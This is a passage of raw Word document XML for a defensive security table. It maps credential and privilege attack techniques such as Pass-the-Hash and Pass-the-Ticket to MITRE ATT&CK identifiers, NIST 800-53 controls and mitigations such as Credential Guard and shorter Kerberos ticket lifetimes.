                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Abuse Elevation Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77A48961" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2567E5" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="314CD73D" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CM-5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608477D4" w14:textId="1A1573F5" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CM-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="066F2A2E" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Implement automated Just-In-Time (JIT) administrative access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6AED59" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="645646AC" w14:textId="233F03E0" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Routinely strip local administrator rights via automated Group Policy loop enforcements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="419FCD17" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39366159" w14:textId="11CC15ED" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pass-the-Hash (PtH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76416141" w14:textId="75D7F1CF" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1550.002: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Alternate Authentication Material</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D127F23" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="354C10FB" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44E4BBC6" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453CF738" w14:textId="48EE53FB" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="147E090A" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enforce Remote Credential Guard.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5069EC35" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EE4FBE1" w14:textId="43DF48F5" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrict local admin accounts from network logins using standard Windows firewall rules and </w:t>
            </w:r>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Deny network access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> user rights assignment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="2135A07D" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22FB9366" w14:textId="221D0672" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pass-the-Ticket (PtT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2852707F" w14:textId="747B0416" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1550.003: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Alternate Authentication Material</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="208A2D25" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A6E9DAF" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54E34653" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB273B4" w14:textId="3CF13DFA" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A0ADD93" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Implement Credential Guard to isolate LSASS memory.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="231AE4BA" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="420DA9BD" w14:textId="2F35C7F8" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shorten Kerberos ticket lifetimes via automated Domain Group Policy updates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="0C776653" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66ADBCEC" w14:textId="138561D0" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Overpass-the-Hash (OtH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32358FB7" w14:textId="6C44AE6A" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1550:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Use Alternate Authentication Material</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DB20C65" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192FC4A4" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46CF84A2" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD71B1F" w14:textId="42A6F0B7" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
